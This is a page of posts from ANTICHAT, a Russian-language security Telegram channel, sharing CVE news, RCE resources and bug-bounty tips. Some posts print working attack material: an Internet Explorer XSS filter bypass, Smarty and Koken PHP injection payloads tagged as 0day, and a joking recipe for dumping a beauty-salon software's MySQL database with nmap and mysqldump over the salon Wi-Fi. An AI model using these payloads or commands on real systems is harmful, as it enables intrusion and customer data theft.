ANTICHAT Channel. Страница 4
7910
@antichat
Официальный канал https://forum.antichat.ru одного из лучших форумов для специалистов в области IT
-
ANTICHAT Channel
Чарльз Фол из ambionics.io опять жжёт. Мало ему было LPE в PHP-FPM, так теперь, как оказалось, он нашёл переполнение буффера в MySQL клиенте PHP. Для триггера, у атакующего должна быть возможность подключаться на подконтрольный хост, c запущенным фейковым MySQL (да-да, Rogue-MySql опять привет). Так как уязвимость эксплуатирует устаревший метод с использованием подключения по "сырому" паролю. В этих ваших инторнетах, даже PoC-и появились, которые доподлинно не проверялись, но выглядят правдоподобно. //UPD Ребята из PT пишут, что всё ок, PoC рабочий. 
-
ANTICHAT Channel
The goal of this project is to provide an OpenSource knowledge database of all the techniques to achieve Remote Code Execution (RCE) on various applications.
Пока не густо:Joomla SweetRice Typo3 Wordpress FuelCMS Moodle JBoss JoGet Tomcat WildFly GiTea Jenkins LimeSurvey
Но PayloadsAllTheThings тоже не сразу строился. И будем надеяться, что больше не придётся скитаться в поисках или ковыряться в закладках по этому поводу 🤞 По возможности коммитим и всячески подбадриваем автора, в том числе звёздочками ⭐️ github.com/p0dalir…chniques
-
ANTICHAT Channel
Небольшой список (не рейтинг) лучших инструментов для поиска секретов и конечных точек в JavaScript файлах LinkFinder SecretFinder nuclei @ 
-
Реклама
-
ANTICHAT Channel
Отличная подборка RCE уязвимостей. Жаль видео на французском, верните мне мой 18 век ;( Но автор также выложил слайды, что тоже ничего. https://www.youtube.com/watch?v=Z9GN6cuggYQ -
ANTICHAT Channel
duckduckgo.com… 🤷♂️ 
-
ANTICHAT Channel
Олды тут? 💿 -
ANTICHAT Channel
SOP, CORS, CSP, WTF... WTF? Предлагаю ознакомиться со свежей статьей от индийского безопасника. Где он на пальцах постарался объяснить принципы работы некоторых защитных механизмов браузеров. А на нашем форуме, вы можете почитать описание кейса, в виде таска с примером, как иногда получается выпутаться из подобных механизмов: НоCSSтальгиR 
-
ANTICHAT Channel
Internet Explorer XSS Filter Bypass Tag: <script/%u0061>alert();</script>
JS:';u0061=alert;1%u0061(document.domain);//
#antichat #0day 😢
-
ANTICHAT Channel
Тут давеча арабский коллега твитнул о мисконфиге в TeamCity. Когда приложение позволяет регистрировать новых пользователей. К примеру, на сабдомене ci.ignite.apache.org этот мисконфиг позволяет админить билды и вообще RCE исполнить. Об этом можно почитать в его статье. Она конечно на арабском, но по скринам понятно что делать. Проверено, работает 😎 TeamCity в Shodan TeamCity в Google 
-
ANTICHAT Channel
c_rehash Command Injection This script is distributed by some operating systems in a manner where it is automatically executed. On such operating systems, an attacker could execute arbitrary commands with the privileges of the script.
CVE-2022-2068 -
ANTICHAT Channel
#людиработают This is how I found 40 open redirection in 2 weeks. Bugcrowd accept open redirect as P4🧵 1. I collected all *,main domains 2. Used passive subdomain finding tools to find domains 3. Used Gau and url crawlers to find logout pages 4. After collecting logout pages I sent this data to burp suite. 5. I used a param miner on all logout paths. To find parameter Param miner found redirect,url,uri, etc params. Tried open redirect payloads manually. And reported 40 open redirects. Note: I want you to look for an open redirect on a bugcrowd program as they accept it as P4. All of my 40 open redirects were not reported to the bugcrowd. Some reported on h1. Like AT&T accepts open redirects too. Beginner can start with open redirection
Трудно? Нет. И ведь поделом, молодец парень, заслужил! Но ещё не так крут. Мы то с вами знаем кто настоящий король опенредиректов 🤫😎 @
-
ANTICHAT Channel
Современный PHP уже не про магические кавычки. Ругать его сейчас практически не за что. Тем не менее, популярность и низкий порог входа делают своё. И много кодеров, до сих пор, продолжают тянуть устаревшую жуть языка. С одной из них, приходится сталкиваться время от времени. Ею является эмуляция Register Globlas. То ли из-за банальной лени, то ли из-за распиздяйства, разработчиком в проект добавляется костыль аля extract($_GET) или $$v в цикле. Например: https://expressionengine.com/?this=1 https://www.whmcs.com/members/?this=1 https://www.1c-bitrix.ru/auth/?this=1
К чему такие финты приводят, можно почитать на нашем форуме - $this - это специальная переменная. А теперь взгляните на скриншот и попробуйте найти уязвимость. Ответ: https://expressionengine.com/?protected=1&_SERVER=1 Тем самым, в условном проекте использующем эту ветку CI, можно зануллить глобальную переменную $is_installed и переустановить приложение. Вот так, гвозди можно забивать микроскопом. Но как всегда, во всём обвинят PHP 🤷♂️
-
ANTICHAT Channel
Authenticated Remote Code Execution in TP-Link Routers Affected Devices If your TP-Link router has backup and restore functionality and firmware is older than june 2022, it is probably vulnerable. Tested With TP-Link Archer AX50, other routers may use different format of backups and exploit needs to be modified. CVE-2022-30075 
-
ANTICHAT Channel
Все же помнят эту весёлую байку? 😁 Оказывается, там в салонах красоты с IT безопасностью вообще беда. Есть такой специализированный софт от evolution-it.ru. И почти 5 лет назад, участник нашего форума описал уязвимость, касающуюся использования дефолтных креденшелов - Уводим клиентскую базу с «Клатч». Как оказалось, воз и ныне там, правда пароль теперь зашит в билд, но всё также статичен. Вкратце, PoC будет выглядеть так. Заваливаемся в салон красоты с девушкой. Заказываем пилинги-шпилинги и пока её прихорашивают для тебя: - Цепляемся к Wi-Fi - Находим сервер: nmap -p 3306 192.168.1.0/24
- Забираем БД:mysqldump -h 192.168.1.233 -u metaUser -p CURRENT_BUILD_PASSWORD klatch > dump.sql
- Открываем свой салон красоты PROFIT! 👙💋❤️
-
ANTICHAT Channel
Smarty PHP Code Injection < 3.1.45 / >= 4.0.0 / < 4.1.1 CVE-2022-29221 PoC: {block name='*/phpinfo();/*'}{/block} {include file='string:*/include"/etc/passwd";exit;/*' inline=1}
-
Реклама
-
ANTICHAT Channel
Sometimes you can be a smart dude and report XSS. But maybe you were too hasty? Think about it. http://koken.cms/preview.php?/albums/&preview=elementary/a:<?=phpcredits();?>
#0day
-
ANTICHAT Channel
-
ANTICHAT Channel